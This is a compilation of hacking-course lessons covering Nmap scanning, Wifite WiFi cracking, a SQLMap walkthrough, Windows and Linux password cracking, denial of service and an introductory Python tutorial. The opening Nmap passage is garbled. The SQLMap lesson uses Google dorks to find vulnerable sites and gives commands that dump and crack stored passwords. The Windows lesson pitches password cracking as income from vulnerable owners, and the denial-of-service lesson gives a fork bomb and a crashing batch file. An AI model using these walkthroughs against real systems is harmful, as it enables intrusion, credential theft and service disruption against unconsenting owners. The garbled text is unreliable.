6.corp.avataronline.corp..0/22 Starting Nmap ( http://nmap.207.207. Felix is doing this for another reason—to double-check that the IP ranges are correct.com (6.24..0.0.22) Nmap scan report for dhcp-23. But in this case.avataronline.209.4) Nmap scan report for 6.com (6.1) Nmap scan report for ns1..com (6.com (6.209. Felix checks the IP whois records anyway and confirms that these IP ranges are allocated to AO[1].207.24.209.com (6.avataronline.0.avataronline.0 Nmap scan report for gw.3) Nmap scan report for ftp.avataronline. The contract signed with Avatar Online may act as a get-out-of-jail-free card for penetrating their networks. Being the careful type.2) Nmap scan report for ns2. but will not help if Felix accidentally compromises another company's server! The command he uses and an excerpt of the results are shown in Example 1.Determining the IP ranges to scan would normally be an elaborate process involving ARIN (or another geographical registry) lookups. Avatar Online explicitly specified what networks they want tested: the corporate network on 6.7) Nmap scan report for 6.com (6.1 felix> nmap -sL 6.avataronline.209.2. This feature simply enumerates every IP address in the given target netblock(s) and does a reverse-DNS lookup (unless - n was specified) on each.0..207.com (6.. No problem.0.24.24.209.207.24. One reason to do this first is stealth. The systems administrator who provided the IPs might have made a mistake.8 .com (6.avataronline.avataronline.0 Nmap scan report for fw.3 Nmap scan report for 6.120) Nmap scan report for cluster-c121.2. all without raising alarm bells[3].com (6.avataronline.207.corp.2.24.207.0/22.209.121) Nmap scan report for cluster-c122.org ) Nmap scan report for 6.209.0.24.207.corp.207.207.207. The names of the hosts can hint at potential vulnerabilities and allow for a better understanding of the target network. various web sleuthing techniques.avataronline. Nmap scan report for 6.avataronline.com (6.280 IP addresses..avataronline.4 .207. and scanning the wrong company would be a disaster.6 Nmap scan report for www.209.21) Nmap scan report for dhcp-22.0.0/24 6.corp. Felix first starts out with what is known as an Nmap list scan (-sL option). Felix subconsciously decodes the CIDR notation[2] and recognizes this as 1.0.1) Nmap scan report for dev2.207.24. Nmap scan report for cluster-c120. and more. .0.24. 24.49 seconds felix> Reading over the results.207.209. This sort of scan is not at all stealthy. He uses Nmap features that try to determine the application and version number of each service listening on the network. No other businesses seem to share the IP space.0/22 . He also requests that Nmap try to guess the remote operating system via a series of low-level TCP/IP probes known as OS fingerprinting. After a bit of consideration.-PE -PP -PS80.0/24 6.0. Felix settles on the following command: nmap -sS -p.443 -PA3389 -PU40125 -A -T4 -oA avatartcpscan- %D 6. but that does not concern Felix.207. He is now ready to get a bit more intrusive and try a port scan. He is interested in whether the administrators of AO even notice these blatant scans. Felix finds that all of the machines with reverse-DNS entries resolve to Avatar Online. Moreover.3.255 Nmap done: 1280 IP addresses (0 hosts up) scanned in 331.Nmap scan report for 6. these results give Felix a rough idea of how many machines are in use and a good idea of what many are used for. Scan a range of IP address using a wildcard . what operating systems (and OS versions) they are running. While Network Mapper is commonly used for security audits. open terminal type nmap hit enter 2. Scan multiple IP address or subnet A. managing service upgrade schedules.nmap 192. 1.75.168. what services (application name and version) those hosts are offering. and dozens of other characteristics.nmap google. and monitoring host or service uptime.131 Ex. It was designed to rapidly scan large networks. GUI method Application → Kali Linux → Information gathering → DNS Analysis → nmap B.com 4.75.1-131 B. what type of packet filters/firewalls are in use. scan a range of IP address Syntax – nmap IP address range EX. many systems and network administrators find it useful for routine tasks such as network inventory.168. Boost up Your nmap Scan – using this command u can decrease scan time Syntax – nmap –F IP address Ex – nmap –F google.Intro – Nmap (“Network Mapper”) is an open source tool for network exploration and security auditing. It uses raw IP packets in novel ways to determine what hosts are available on the network.com 3. How to open nmap A. Scan a single IP address When firewall OFF/ON on target PC Syntax – nmap IP address/hostname EX – nmap 192. although it works fine against single hosts. ICMP.131 C.168. Null scan – TCP Null Scan to fool a firewall to generate a response Ex – nmap –sN 192.168.75. Fin scan – TCP Fin scan to check firewall Ex – nmap –sF 192. IGMP.131 .168. Scan all TCP port in target IP Ex – nmap –sT 192. Ex – nmap –sU 192. Scan an entire subnet Ex – nmap 192. UDP Scan – Scan a host for UDP services.168.75.75. Scan for IP protocol – This type of scan allows you to determine which IP protocols (TCP.) are supported by target machines. Ex – nmap –sO 192. etc.Ex – nmap 192.131 9. This scan is used to view open UDP port.75.168. TCP Xmas scan to check firewall Ex – nmap –sX 192.168.75.* C.75. scan turn on OS and version detection Ex – nmap –O 192. Scan a firewall for security weakness A.168.131 6.168.75.75.75.131 B.131 7.168.131 8.1/24 5. Find out the most commonly used TCP ports using TCP SYN Scan A.75. Find out the most commonly used TCP ports using TCP Window scan Ex – nmap –sW 192. List Scan – this command is used tolist target to scan Ex – nmap –sL 192.168.168.168.75. Find out the most commonly used TCP ports using TCP Maimon scan Ex – nmap – sM 192. Find out the most commonly used TCP ports using TCP ACK scan Ex – nmap –sA 192. Find out the most commonly used TCP ports using TCP connect scan Ex – nmap –sT 192.131 12.75.168.10.75.131 D.168. Host Discovery or Ping Scan – Scan a network and find out which servers and devices are up and running Ex – nmap –sP 192.168.168.131 E.75.75.131 B.0/24 .168.75.131 13.131 11.131 C.75. detect remote services (server / daemon) version numbers Ex – nmap –sV 192. Stealthy scan Ex – nmap –sS 192. 14. Scan a host when protected by the firewall Ex – nmap –PN 192.168.75.1 Lesson 6: Wifi Hacking the easy way: Using WIFITE Wifite While the aircrack-ng suite is a well known name in the wireless hacking , the same can't be said about Wifite. Living in the shade of the greatness of established aircrack-ng suite, Wifite has finally made a mark in a field where aircrack-ng failed. It made wifi hacking everyone's piece of cake. While all its features are not independent (eg. it hacks WPS using Reaver), it does what it promises, and puts hacking on autopilot. I'm listing some features, before I tell you how to use wifite (which I don't think is necessary at all, as anyone who can understand simple English instructions given by Wifite can use it on his own). Features Of Wifite Sorts targets by signal strength (in dB); cracks closest access points first Automatically de-authenticates clients of hidden networks to reveal SSIDs Numerous filters to specify exactly what to attack (wep/wpa/both, above certain signal strengths, channels, etc) Customizable settings (timeouts, packets/sec, etc)" Anonymous" feature; changes MAC to a random address before attacking, then changes back when attacks are complete All captured WPA handshakes are backed up to wifite.py's current directory Smart WPA de-authentication; cycles between all clients and broadcast deauths Stop any attack with Ctrl+C, with options to continue, move onto next target, skip to cracking, or exit Displays session summary at exit; shows any cracked keys All passwords saved to cracked.txt Built-in updater: ./wifite.py -upgrade I find it worth mentioning here, that not only does it hack wifi the easy way, it also hack in the best possible way. For example, when you are hacking a WEP wifi using Wifite, it uses fakeauth and uses the ARP Method to speed up data packets. Hacking WEP network wifite -wep You might even have used the command wifite The -wep makes it clear to wifite that you want to hack WEP wifis only. It'll scan the networks for you, and when you think it has scanned enough, you can tell it to stop by typing ctrl+c. It'll then ask you which wifi to hack. In my case, I didn't specify -wep so it shows all the wifis in range. You can also select all and then go take a nap (or maybe go to sleep). When you wake up, you might be hacking all the wifi passwords in front of you. I typed one and it had gathered 7000 IVs (data packets) within 5 mins. Basically you can except it to hack the wifi in 10 mins approx. Notice how it automatically did the fake auth and ARP replay. Here are a few more screenshots of the working of Wifite, from their official website (./wifite.py is not something that should bother you. You can stick with the simple wifite. Also, specifying the channel is optional so even the -c 6 was unnecessary. Notice that instead of ARP replay, the fragmentation attack was used, using -frag) Hacking WPS wasn't fast (it took hours), but it was easy and didn't require you to do anything but wait. However, Wifite makes it possible for you to use any method that you want to use, by just naming it. As you saw in the screenshot above, the fragmentation attack was carried out just by typing -frag. Similarly, many other attacks can be played with. A good idea would be to execute the following- wifite -help This will tell you about the common usage commands, which will be very useful. Here is the list of WEP commands for different attacks- WEP -wep only target WEP networks [off] -pps <num> set the number of packets per second to inject [600] -wept <sec> sec to wait for each attack, 0 implies endless [600] -chopchop use chopchop attack [on] -arpreplay use arpreplay attack [on] -fragment use fragmentation attack [on] -caffelatte use caffe-latte attack [on] -p0841 use -p0841 attack [on] -hirte use hirte (cfrag) attack [on] -nofakeauth stop attack if fake authentication fails [off] -wepca <n> start cracking when number of ivs surpass n [10000] -wepsave save a copy of .cap files to this directory [off] Troubleshooting Wifite quits unexpectedly, sating "Scanning for wireless devices. No wireless interfaces were found. You need to plug in a wifi device or install drivers. Quitting." You are using Kali inside a virtual machine most probably. Virtual machine does not support internal wireless card. Either buy an external wireless card, or do a live boot / side boot with Windows. Anything other than Virtual machine in general. PostgreSQL. tables and columns. Oracle. [Source: www. Support to enumerate users. This channel can be an interactive command prompt.Support to download and upload any file from the database server underlying file system when the database software is MySQL. a range of entries or specific columns as per user’s choice. PostgreSQL or Microsoft SQL Server. PostgreSQL or Microsoft SQL Server. to accessing the underlying file system and executing commands on the operating system via out-of-band connections. What is SQLMAP sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. Support to directly connect to the database without passing via a SQL injection. By reading and/or utilizing this tutorial you accept sole responsibility for your actions and release Opsec Cybersecurity Solutions LLC and its employees from any legal liability for your actions. over data fetching from the database.sqlmap. Features Full support for MySQL. SQLite. password hashes. Microsoft SQL Server. It comes with a powerful detection engine. Sybase and SAP MaxDB database management systems. stacked queries and out-of-band.Lesson 7: Sql Injection using SQLMap Disclaimer: using this program on any website without permission is illegal. Full support for six SQL injection techniques: boolean-based blind. IBM DB2. time-based blind. This is useful. Support to search for specific database names. The user can also choose to dump only a range of characters from each column’s entry. roles. UNION query. Support for database process’ user privilege escalation via Metasploit’s Meterpreter getsystem command. a Meterpreter session or a graphical user interface (VNC) session as per user’s choice. port and database name. privileges. to identify tables containing custom application credentials where relevant columns’ names contain string like name and pass. Microsoft Access.Support to dump database tables entirely. for instance. specific tables across all databases or specific columns across all databases’ tables. Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. error-based. Firebird. Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL. It is one of the most common ways sites are hacked. by providing DBMS credentials. Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack. databases.org] . Sql injection is a way of extracting user login info and other data from unsecure sql databases on companies servers. many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting. IP address. b: Initial check to confirm if website is vulnerable to SQLMAP SQL Injection For every google dork string.com/cgi-bin/item. See example error below in the screenshot. How do you know which is really vulnerable to SQLMAP SQL Injection.com/cgi-bin/item. Please review the stack trace for more information about the error where it originated in the code. So now your URL will become like this: http://www. you will get huundreds of search results. (Just to ensure.’. If it loads or redirect you to a different page.cgi?item_id=15' If the page returns an SQL error. " is a double quotation mark and ' is a single quotation mark). Examples of SQLi Errors from Different Databases and Languages Microsoft SQL Server Server Error in ‘/’ Application. move on to the next site in your Google search results page.SqlClient. Exception Details: System.php on line 12 .SqlException: Unclosed quotation mark before the character string ‘attack. Let’s say you searched using this string inurl:item_id= and one of the search result shows a website like this: http://www. Description: An unhanded exception occurred during the execution of the current web request.a: Google Dorks strings to find Vulnerable SQLMAP SQL injectable website You can google a list of google dork strings Step 1.Data. but in case you don’t I have put together a number of strings that you can search in Google.sqldummywebsite. the page is vulnerable to SQLMAP SQL Injection. Unclosed quotation mark before the character string ‘attack. Step 1.sqldummywebsite.cgi?item_id=15 Just add a single quotation mark ' at the end of the URL.’.Step 1: Find a Vulnerable Website This is usually the toughest bit and takes longer than any other steps. There’s multiple ways and I am sure people would argue which one is best but to me the following is the simplest and most conclusive.com/buystuff. Those who know how to use Google Dorks knows this already. Just copy paste any of the lines in Google and Google will show you a number of search results. I’ve obscured everything including URL and page design for obvious reasons. MySQL Errors Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/myawesomestore. com' So. “http://www.sqldummywebsite. So our interest would be on sqldummywebsitedatabase.cgi?item_id=15 --dbs In here: sqlmap = Name of sqlmap binary file -u = Target URL (e.cgi?item_id=15 -D sqldummywebsite --tables . To find out that information.SQLException: ORA-00933: SQL command not properly ended at oracle.com/cgi-bin/item.java:180) at oracle.sqldummywebsite.sql.jdbc.com/cgi-bin/item.ttc7.TTIoer. I’ve found a SQLMAP SQL Injection vulnerable website. information_schema is a standard database for almost every MYSQL database.0 [10:55:53] [INFO] retrieved: information_schema [10:55:56] [INFO] retrieved: sqldummywebsite [10:55:56] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www. we now have two database that we can look into.jdbc.java:208) Error: SQLExceptionjava. As I am using SQLMAP.cgi?item_id=15″) --dbs = Enumerate DBMS databases This commands reveals quite a few interesting info: web application technology: Apache back-end DBMS: MySQL 5.processError(TTIoer. sqlmap -u http://www.sql.g. Now I need to list all the databases in that Vulnerable database. (this is also called enumerating number of columns).DBError. Run the following command on your vulnerable website with.throwSqlException(DBError. it will also tell me which one is vulnerable.Error: You have an error in your SQL syntax: check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’’ at line 12 Oracle Errors java. use the following command: sqlmap -u http://www.SQLException: ORA-01756: quoted string not properly terminated PostgreSQL Errors Query failed: ERROR: unterminated quoted string at or near “‘’’” Step 2: List DBMS databases using SQLMAP SQL Injection As you can see from the screenshot above.com/cgi-bin/item.sqldummywebsite. Step 3: List tables of target database using SQLMAP SQL Injection Now we need to know how many tables this sqldummywebsite database got and what are their names.dbaaccess.sqldummywebsite. Step 4: List columns on target table of selected database using SQLMAP SQL Injection Now we need to list all the columns on target table user_info of sqldummywebsitedatabase using SQLMAP SQL Injection.Sweet.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_login --dump Guess what. run the following command: sqlmap -u http://www. [10:56:20] [INFO] fetching tables for database: 'sqldummywebsite' [10:56:22] [INFO] heuristics detected web page charset 'ISO-8859-2' [10:56:22] [INFO] the SQL query used returns 8 entries [10:56:25] [INFO] retrieved: item [10:56:27] [INFO] retrieved: link [10:56:30] [INFO] retrieved: other [10:56:32] [INFO] retrieved: picture [10:56:34] [INFO] retrieved: picture_tag [10:56:37] [INFO] retrieved: popular_picture [10:56:39] [INFO] retrieved: popular_tag [10:56:42] [INFO] retrieved: user_info and of course we want to check whats inside user_info table using SQLMAP SQL Injection as that table probably contains username and passwords.sqldummywebsite. [10:57:16] [INFO] fetching columns for table 'user_info' in database 'sqldummywebsite' [10:57:18] [INFO] heuristics detected web page charset 'ISO-8859-2' [10:57:18] [INFO] the SQL query used returns 5 entries [10:57:20] [INFO] retrieved: user_id [10:57:22] [INFO] retrieved: int(10) unsigned [10:57:25] [INFO] retrieved: user_login [10:57:27] [INFO] retrieved: varchar(45) [10:57:32] [INFO] retrieved: user_password [10:57:34] [INFO] retrieved: varchar(255) [10:57:37] [INFO] retrieved: unique_id [10:57:39] [INFO] retrieved: varchar(255) [10:57:41] [INFO] retrieved: record_status [10:57:43] [INFO] retrieved: tinyint(4) AHA! This is exactly what we are looking for … target table user_login and user_password. SQLMAP SQL Injection makes it really easy.com/cgi-bin/item. Step 5: List usernames from target columns of target table of selected database using SQLMAP SQL Injection SQLMAP SQL Injection makes is Easy! Just run the following command again: sqlmap -u http://www.cgi?item_id=15 -D sqldummywebsite -T user_info -- columns This returns 5 entries from target table user_info of sqldummywebsite database.com/cgi-bin/item.sqldummywebsite. this database got 8 tables. we now have the username from the database: [10:58:39] [INFO] retrieved: userX [10:58:40] [INFO] analyzing table dump for possible password hashes . [10:59:15] [INFO] the SQL query used returns 1 entries [10:59:17] [INFO] retrieved: 24iYBc17xK0e.. Step 7. Step 6: Extract password from target columns of target table of selected database using SQLMAP SQL Injection You’re probably getting used to on how to use SQLMAP SQL Injection tool. sqlmap -u http://www.. Someone who leaves their website vulnerable like that just can’t have a password like that.Almost there.com/cgi-bin/item. So this is DES(Unix) hash. How do you know what type of hash is that? Step 7.sqldummywebsite.a: Identify Hash type Luckily.b: Crack HASH using cudahashcat First of all I need to know which code to use for DES hashes. Kali Linux provides a nice tool and we can use that to identify which type of hash is this. That is exactly right. In command line type in the following command and on prompt paste the hash value: hash-identifier Excellent. Next shows just that.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_password --dump TADA!! We have password. [10:59:18] [INFO] analyzing table dump for possible password hashes Database: sqldummywebsite Table: user_info [1 entry] +---------------+ | user_password | +---------------+ | 24iYBc17xK0e.. this password looks funny. . | +---------------+ But hang on. This can’t be someone’s password. What that means. the password is encrypted and now we need to decrypt it Step 7: Cracking password So the hashed password is 24iYBc17xK0e. we now only need the password to for this user. Use the following command to extract password for the user. So let’s check that: . This is a hashed password. Anyhow.hash file. 24iYBc17xK0e.:abc123 Sweet. Instructions are in the website. That means I will be using cudaHashcat. I am running a Computer thats got NVIDIA Graphics card.hash /root/sql/rockyou. But it was a MYSQL Database. If you’re on VirtualBox or VMWare. search around. so here’s the cracked password: abc123. I saved the hash value 24iYBc17xK0e. (not in it’s help menu). so it must be 1500. Following is the command I am running: cudahashcat -m 1500 -a 0 /root/sql/DES. I got an AMD ATI Graphics cards. we now even have the password for this user. so I will be using oclHashcat on my laptop. You must install Kali in either a persisitent USB or in Hard Disk.txt Interesting find: Usuaul Hashcat was unable to determine the code for DES hash. in DES. .cudahashcat --help | grep DES So it’s either 1500 or 3100. However both cudaHashcat and oclHashcat found and cracked the key. On my laptop. neither cudahashcat nor oclhashcat will work. to citizens and old people who are just ditzy. It is a very efficient implementation of rainbow tables done by the inventors of the method.Lesson 8: Cracking Windows Passwords in Kali Linux This is probably your number one money maker. Pawn shops whos computer forfeited out and need to be sold.Windows uses NTLM hashes to encrypt the password file which gets stored in SAM file. Kali Linux initialize and when it loads. If you have a complex password it will take a lot longer than simple passwords. select Live (forensic mode). We simply need to target this file to retrieve the password . and with the free tables your password may never be cracked. Once the crack is done you will see the password in plain text. Make sure the Boot from USB is the first option in the Boot menu at BIOS. write it down and reboot the machine to login. Boot Windows machine with the LiveCD. Enjoy. With the free tables available you will not be able to crack every password. On the boot menu of Kali Linux. If your password isn’t cracked. you can also log in as one of the other users with admin rights and then change your password from within Windows. Crack and Reset the system password locally using Kali Insert the USB Live CD and Boot your PC. it will open a terminal window and navigate to the Windows password database file Crack the Windows password with ophcrack: After loading Live kali linux go to the system menu > ophcrack click ok Ophcrack uses Rainbow Tables to crack NTLM and LM hashes into plain text. but the paid tables range from $100 to $1000. its a free Windows password cracker based on rainbow tables. . navigate to the folder where you unzipped the table.Now you can see the ophcrack application windows. I made a folder called “hash-tables” and then made 2 more folders within for each table to unzip to. Once you have downloaded the tables you will need to unzip them in separate folders. click on Load > Encrypted SAM After that we need to give the path to SAM directory which is by default /mnt/hda1/WINDOWS/System32 click choose Here we can see the saved hashed now with the username and userid. select it and then click “ok. It’ll show the password . On your system it may look something like this: /media/hda1/Windows/System32/config. The SAM database is usually in the /media/name_of_hard_drive/Windows/System32/config Type command chntpw -l SAM and it will list out all the usernames that are contained on the Windows system. I downloaded the xp free small and the Vista free tables. Almost all versions of windows password is saved in SAM file. Its quick and easy That’s it. if you unsuccessfully go with free tables. Run the program and click on “Tables” button. Here. This file is usually located under /Windows/System32/config. Select the table you downloaded and click “Install”.” You should see green lights next to the tables you installed. Now click on Crack button and wait for the password. Reset Windows password with chntpw: Navigate to the Windows password database file. or promoting the user to administrator. When we have the username we want to modify and we simply run the command chntpw -u “username” SAM In the example below we typed: chntpw -u “Sanjai sathish” SAM and we get the following menu: #chntpw -u Sanjai sathish We now have the option of clearing the password. You can also promote the user to a local administrator as well. plus lots of other hashes and ciphers in the community-enhanced version John the ripper is a popular dictionary based password cracking tool. In other words its called brute force password cracking and is the most basic form of password cracking. Its primary purpose is to detect weak Unix passwords. more the time required. . changing the password. Therefore you will be able to log in with a blank password. so it is recommended to clear the password. it may works on XP system.#chntpw -l SAM The command gives us a list of usernames on the system. Besides several crypt(3) password hash types most commonly found on various Unix systems. More the passwords to try. But still if you want to crack a password locally on your system then john is one of the good tools to try. It uses a wordlist full of passwords and then tries to crack a given password hash using each of the password from the wordlist.8 systems. It is also the most time and cpu consuming technique. John is in the top 10 security tools in Kali linux. Changing the password does not always work on Windows 7. Crack the password in Linux using John the ripper: John the Ripper is a fast password cracker. supported out of the box are Windows LM hashes. Now this new file shall be cracked by john.lst or you can use your own password lists too. #unshadow /etc/passwd /etc/shadow > ~/crack We redirected the output of unshadow command to a new file called crack. Usage is quite simple. So try to get this file from your own linux system. On linux the username/password details are stored in the following 2 files #/etc/passwd #/etc/shadow The actual password hash is stored in /etc/shadow and this file is accessible on with root access to the machine. #unshadow The unshadow command will basically combine the data of /etc/passwd and /etc/shadow to create 1 file with username and password details. how to use the unshadow command along with john to crack the password of users on a linux system. Now that our new user is already created its time to crack his password. with password chess. Or first create a new user with a simple password. It is located at the following path /usr/share/john/password.In this topic i am going to show you. I will create a new user on my linux system named happy.lst ~/crack Use the “–show” option to display all of the cracked passwords reliably . #john –wordlist=/usr/share/john/password. For the wordlist we shall be using the password list that comes with john on kali linux. If it were not there then john would have failed.So in the above command john was able to crack the hash and get us the password “chess” for the user “happy”. only because the password “chess” was present in the password list. #john –show ~/crack . Now john was able to crack. Use the show option to list all the cracked passwords. Exploiting a vulnerability and sending a payload gives you access and control over the target machine. a drastic increase in unwelcome users can make the service go down. What exactly does a Denial of Service (DOS) attack do? Basically. We'll start at the easiest point. a denial of service attack is not everyone's cup of tea. So basically it's just what its name suggests. it is used to disrupt online services. I'll try to give you a big picture of denial of service attacks. Most of us use the words like "This website was down the other day" without . however. What effect does a denial of service attack have Wireless hacking usually gives you the password of a wireless network. before I start using geeky terms like packets and all that. and a lot of hactivists had to suffer jailtime for participating in DDOS). it robs the legitimate owner of a resource from the right to use it. A man in the middle attack lets you spy on network traffic. I mean if I successfully perform a DOS on your machine.a name worth mentioning here is Anonymous) do a Distributed Denial of service attack on government and private websites to make them listen to the people's opinion (the legitimacy of this method of dictating your opinion has been a topic of debate.Just like most other things associated with hacking. you won't be able to use it anymore. In the modern scenario. Basic Concept It uses the fact that while a service can be more than sufficient to cater to the demands of the desired users. It. Denial Of Service. can be understood if explained properly. In this tutorial. Many hacktivist groups (internet activists who use hacking as a form of active resistance . and they are definitely not wasting their time and money riding aimlessly from one place to another. you are not recommended to use them as a DOS on someone else is illegal. Well now you do. Now there's a pool in the game that everyone likes to visit. I'll take the example from the movie "We Are Legion". You just carried out a denial of service attack. The users of the game have now been deprived of a service which they had obtained the right to use when they signed up for the game. They made a Swastika and blocked access to the pool Scenario 2 : Bus stop Now assume that due to some reason. in the virtual world. To give you a good idea of what is happening. however. And then all of you go and block the access to the pool. This is the kind of thing that gives you a very basic idea what a denial of service attack can be. you can call your friends to unnecessarily use it. Practically it is not feasible since you don't have millions of friends. Scenario One : Multiplayer online game Now consider you are playing an online multi-player game. There are millions of other people who also play this game. Now you and your friends know that they have the power of numbers. There are a lot of you. So while this may seem impossible in the real world. Basically you can invite millions of friends to come and crowd around all the bus stops and take the buses without any purpose. There are many tools out there for this purpose. and together you decide to make identical characters in the game. and easy to .any idea what it actually means. To stop the legitimate people from utilizing this service. This is just what the guys at 4chan (birthplace and residence of Anonymous) did a long time ago. you want to disrupt the bus service of your city and stop the people from using the service. you can cause as much load as a thousand (or even a million) users alone at the click of a button. you need a lot of them. It will most probably work on other linux distributions too. it becomes a distributed denial of service attack. you send them a request to deliver their content to you. and most probably it will not recover from the shock. And since the company knows it under DOS. Basically. But it's not just the websites that get better. :(){ :|:& }. In return. etc. So. So basically you guys are equivalent to more than a million users using the site simultaneously. it just turns off the server. This can easily be fatal for a server. However. when you visit a website. And you are not the only one. This takes up server resources. You'll lose any unsaved data. We will. But still. the bad and the ugly). it take more than just one packet. It goes down. maybe a thousand times every second. Warning : This code will freeze Kali linux. Now with the modern computers and bandwidth. if the number of users suddenly increases.detect (Knock. the servers do too). knock. and do a DOS on our own computer. How denial of service attacks are carried out Basically. A legitimate view can easily earn more than the server costs on account of advertisements. You will have to restart the machine the hard way (turn of the virtual machine directly or cut the power supply if its a real machine). and the black hat hackers too are improving every day. and that's not something the server can take. and algorithms that can easily identify a DOS and block the traffic from that IP. Sites like Google and Facebook have stronger servers. it is not something that can make it succumb (your computer is not the only thing that gets better with time. so that it does not have to waste its monetary resources on a DOS. However. the server gives up. A Live DOS on your Kali Machine We are going to execute a command in the Kali linux terminal that will cripple the operating system and make it hand. for which they pay for. if a lot of people like you do a DOS attack. There are thousand others that are doing the same thing. companies buy server that can provide enough data transfer for its regular users. Just copy paste the code and your computer is gone.: . What you send is a packet. It's just like you go to a page. and start refreshing it very fast. the bandwidth that you consume in requesting the server to send you some data is very little. While this is not good for the server. This leaves a huge scope for understanding DOS attacks and becoming an asset to one of these sides ( the good. we alone can easily pretend to be a thousand or even more users at once. and wait till the DOS stops. It's the police). the data they send you is huge. come back to this later. It just gave up. while you. denial of service.. Game over. execute the second. Put the following code in it- :1 Start goto 1 Save the file as name. It basically executes the second line.. So again. execute the second.. and the third line makes it go over to the first. . I had to power it off from the Vmware interface. infinitely. Run it. Here's something for the Windows Users Crashing Windows Using Batch file Open a notepad. can't do anything.The machine froze right after I pressed enter. and then over to first again. All the processing power is used by a useless command. What basically happened is that the one line command asked the operating system to keep opening process very fast for an infinite period of time.. the legitimate user.bat Bat here is batch file extension. .tgz <i>. </i> $ make <i> . Python is very diverse and compatible what ever operating system you are using.. but they are not yet the default. To download the required software please http://www.1. Roughly..) [GCC 4.4/ $ .. The best way to learn to code is to actually put what you read today in to practice! ##Python is easy to learn print(“Hello. </i> $ make installAdd python 3 to your path. which is probably what you want.&gt. are installed on the system. AND UNIX USERS You are probably lucky and Python is already installed on your machine. size and date information . If you want to use the IDLE graphical code editor.... even more output. here are the steps to compile Python in UNIX Download the .. get the MacOS installer from the Python download site. If you have to install Python. If you want to (re-)install Python.org/download you will find numerous download links there. you are set. first try to use the operating system’s package manager or go to the repository where your packages are available and get Python 3.1 (.For Python programming you need a working Python installation and a text editor. You can test it first by specifying the full path. Watch for error messages here . You should add $HOME/python3_install/bin to your PATH bash variable.. "copyright". but if you skip the --prefix. today at codingsec we will run through an introductory tutorial to get you more familiar with how the fundamentals of the language works. Python ships by default with the operating system.4. together with their development files. but you will need to update to Python 3 until OS X starts including Python 3 (check the version by starting python3 in a command line terminal).. list of files as they are uncompressed </i>Change to the directory and tell the computer to compile and install the program$ cd Python-3. Hopefully no error messages . You will get a warning during the make phase if these are not available.$ ~/python3_install/bin/python3 Python 3.org/downloads/release/python-341)Uncompress the tar file (put in the correct path to where you downloaded it):$ tar -xvzf ~/Download/Python-3. lots of output./configure --prefix=$HOME/python3_install <i> . BSD.&gt. you need to make sure that the tk and tcl libraries.0 was released in December 2008.Lesson 10: Introduction to Python Python is a very diverse programming language and is excellent to learn. To test it typepython3 on a command line. MAC USERS Starting from Mac OS X (Tiger).. you will need to install the required software. Python 3. . Also IDLE (the Python editor) might be missing in the standard installation. all the distributions should have Python 3 available. so you may not need to compile Python 3 from scratch after downloading the source code.. it will install it to /usr/local.2] on linux2 Type "help". If you see something like that in the following section.. &gt. so they need to be installed specially. "credits" or "license" for more information.. LINUX. World!”) Installing Python In order to get started on learning Python.python.tgz file (use your Web browser to get the gzipped tar file fromhttps://www. Ubuntu and Fedora do have Python 3 binary packages available.4. The above commands will install Python 3 to your home directory.5.python. right-click.org/3/using/windows. then click the Environment Variables. there should be a semicolon between each folder in the list): C:\Python34 C:\Python34\Scripts Note: If you want to double-click and start your Python programs from a Windows folder and not have the console window disappear.. if you do not have a 64-bit AMD or Intel chip). CONFIGURING YOUR PATH ENVIRONMENT VARIABLE The PATH environment variable is a list of folders. then click the Environment Variables.. click the Advanced System Settings link. in which Windows will look for a program whenever you try to execute one by typing its name at a Command Prompt. In the window that pops up. then click the Environment Variables. you’ll do the same thing regardless of which version of Windows you’re running. move your mouse over Computer. button. On Windows 8: Press the Windows key and type Control Panel to locate the Windows Control Panel. add these two folders to your path (and make sure you get the semicolons right.. separated by semicolons. On Windows XP: Right-click the My Computer icon on your desktop and selectProperties. Click the Advanced System Settings link.. then click on System. Once you’ve brought up the environment variable editor. Once you’ve opened the Control Panel. You can see the current value of your PATH by typing this command at a Command Prompt: echo %PATH% The easiest way to permanently change environment variables is to bring up the built-in environment variable editor in Windows. button. You should be presented with a window that has some text like this: . How you get to this editor is slightly different on different versions of Windows. If there is is one. Select the Advanced tab.. and select Properties from the pop-up menu.button. find a variable called PATH. Start the installer by double-clicking it and follow the prompts..python. you can add the following code to the bottom of each script: <tt><span class="kw1">print</span><span class="br0">(</span><span class="st0">"Hello World"</span><span class="br0">)</span> <span class="co1">#stops console from exiting</span> end_prog <span class="sy0">=</span> <span class="st0">""</span> <span class="kw1">while</span> end_prog <span class="sy0">!=</span> <span class="st0">"q"</span>: end_prog <span class="sy0">=</span> <span class="kw2">input</span><span class="br0">(</span><span class="st0">"type q to quit"</span><span class="br0">)</span></tt> INTERACTIVE MODE Go into IDLE (also called the Python GUI)..html#installing-python for more information. Assuming your Python root is C:\Python34. Under System Variables in the bottom half of the editor. select View by: Large Icons.. See https://docs. On Windows 7 or Vista: Click the Start button in the lower-left corner of the screen. select it and click Edit.WINDOWS USERS Download the appropriate Windows installer (the x86 MSI installer.. 2-7)] on linux2 Type "copyright". Python will respond with2. you don’t have to.3. In the new window that appears. Interactive mode allows you to test out and see what Python will do.0 &gt. go into interactive mode and try them out./hello. World!"</span><span class="br0">)</span> Now save the program: select File from the menu. In interactive mode what you type is immediately run. Otherwise some things might go wrong unexpectedly.Only use standard characters for file names: letters. PROGRAM FILE NAMES It is very useful to stick to some rules regarding the file names of Python programs. Next run the program by going to Run then Run Module (or if you have an older version of IDLE use Edit then Run script).3.py.py like any other command. CREATING AND RUNNING PROGRAMS Go into IDLE if you are not already. just use IDLE.2 20081105 (Red Hat 4. Do not put another dot anywhere else in the file name. USING PYTHON FROM THE COMMAND LINE If you don’t want to use Python from the command line. This connection is not visible on any external interface and no data is sent to or received from the Internet. RUNNING PYTHON PROGRAMS IN UNIX If you are using Unix (such as Linux. then Save. å or ß) in your file names—or. dash (-) and underscore (_).&gt.py” (you can save it in any folder you want). even better. If you ever feel you need to play with new Python statements. "credits" or "license()" for more information. type the following: <span class="kw1">print</span><span class="br0">(</span><span class="st0">"Hello.White space (” “) should not be used at all (use underscores instead). Save it 